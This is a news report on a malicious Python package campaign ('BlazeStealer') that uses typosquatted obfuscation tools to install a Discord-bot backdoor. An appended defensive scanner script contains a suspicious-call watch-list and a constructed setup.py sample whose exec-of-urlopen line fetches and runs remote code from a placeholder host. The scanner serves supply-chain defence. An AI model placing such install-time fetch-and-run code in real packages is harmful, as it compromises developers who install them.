Threat actor targets developers with malicious Python packages
New research by Checkmarx has unveiled a threat actor who has been publishing malicious Python packages to an open-source package repository for approximately six months.
Open-source tools and packages serve an essential role in streamlining tasks and boosting development processes in the realm of software development. However, as the community expands, the number of malevolent actors looking to exploit it also increases. An illustration of this is developers being targeted by seemingly legitimate Python obfuscation packages laced with harmful code.
Throughout 2023, attackers distributed harmful Python packages disguised as genuine obfuscation tools, with malicious payloads that activate upon installation. Dubbed "BlazeStealer", the payload retrieves an additional malicious script from an external source, which in turn sets up a Discord bot.
Consequently, attackers gain complete control over the victim's computer. Developers engaged in code obfuscation are likely working with valuable and sensitive information, making them valuable targets and, thus, probable victims of this attack.
To this end, numerous packages with names beginning with pyobf, such as pyobftoexe, pyobfusfile, pyobfexecute and, most recently, pyobfgood, were rolled out. These packages, disguised as useful tools for Python code obfuscation, carry concealed intentions.
Notably, the attackers strategically chose these names to imitate authentic packages, such as pyobf2 and pyobfuscator, utilised by developers for obfuscating their Python code.
The most recent, pyobfgood, was published in late October 2023 and ushered in a devastating payload. The package's setup.py and __init__.py files contain a script that becomes active upon package installation, fetching code from an external source and executing it.
This malware, aptly titled BlazeStealer, operates a Discord bot with a unique identifier. Functionally, it provides attackers with full access to the victim's system, facilitating harmful actions such as exfiltrating detailed host information, stealing Chrome web browser passwords, establishing keyloggers, downloading files, capturing screenshots, and more menacingly, rendering the computer inoperative. The bot can even deactivate Windows Defender and Task Manager, and run any command on the compromised host.
Peculiarly, the Discord bot contains a specific command that can control the computer's camera. By stealthily downloading a zip file from a remote server, extracting its contents, and running a programme called WebCamImageSave.exe, the bot is able to secretly capture a photo using the webcam. The resulting image is discreetly sent back to the Discord channel, leaving no trace of its presence after deleting the downloaded files.
The audacity of the attackers becomes starkly evident through the bot's malicious 'humour'. It sends messages ridiculing the imminent destruction of the compromised machine, displaying phrases such as "Your computer is going to start burning, good luck. :)" and "Your computer is going to die now, good luck getting it back :)" towards its victims.
The attackers are specifically targeting developers involved in code obfuscation. As these individuals are likely handling valuable and sensitive information, they present attractive targets to hackers.
Checkmarx states that developers must remain vigilant and thoroughly vet packages before employing them. As part of its Supply Chain Security solution, Checkmarx's research team consistently monitors suspicious activity in the open-source software ecosystem, tracking and flagging signals that may imply foul play and promptly alerting its customers to help safeguard them.
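As an added, defender-side example (not code from the Checkmarx research or from the packages it describes), the following vetting script statically flags a setup.py that contains the install-time fetch-and-execute pattern described above, so it can be run on a downloaded sdist before `pip install` executes anything. The watch-list of call targets and the two sample setup.py files are constructed for this illustration.

```python
import ast

# Hypothetical watch-list of call targets that have no business in a setup
# script; tune it for your own environment.
SUSPICIOUS_CALLS = {
    "exec", "eval", "compile", "__import__",
    "os.system", "os.popen", "subprocess.run", "subprocess.Popen",
    "subprocess.call", "subprocess.check_output",
    "urllib.request.urlopen", "requests.get", "requests.post",
    "base64.b64decode",
}


def _dotted_name(node):
    """Render a call target such as urllib.request.urlopen as one string."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted_name(node.value)
        return f"{base}.{node.attr}" if base else node.attr
    return ""


def scan_setup_source(source):
    """Return sorted [(line, finding)] for install-time code execution risks:
    calls on the watch-list, and setup(cmdclass=...) hooks, which run
    arbitrary code during `pip install` even when no exec() is visible."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name in SUSPICIOUS_CALLS:
            findings.append((node.lineno, name))
        if name == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
            findings.append((node.lineno, "setup(cmdclass=...)"))
    return sorted(findings)


# Constructed samples (not the real packages): a fetch-and-run setup.py of the
# kind described above, and a harmless one for comparison. Both are plain
# strings here, so nothing in them is ever executed by this script.
MALICIOUS_SAMPLE = '''\
from setuptools import setup
import urllib.request
# stage two is pulled from a placeholder URL and executed during install
exec(urllib.request.urlopen("https://example.invalid/stage2.py").read())
setup(name="pyobf-lookalike", version="0.0.1")
'''
CLEAN_SAMPLE = '''\
from setuptools import setup
setup(name="harmless", version="1.0.0", packages=["harmless"])
'''
```

Running `scan_setup_source(open("setup.py").read())` on an extracted sdist gives a quick triage signal; an empty result is not a clean bill of health, since obfuscated or string-built calls evade a name-based check.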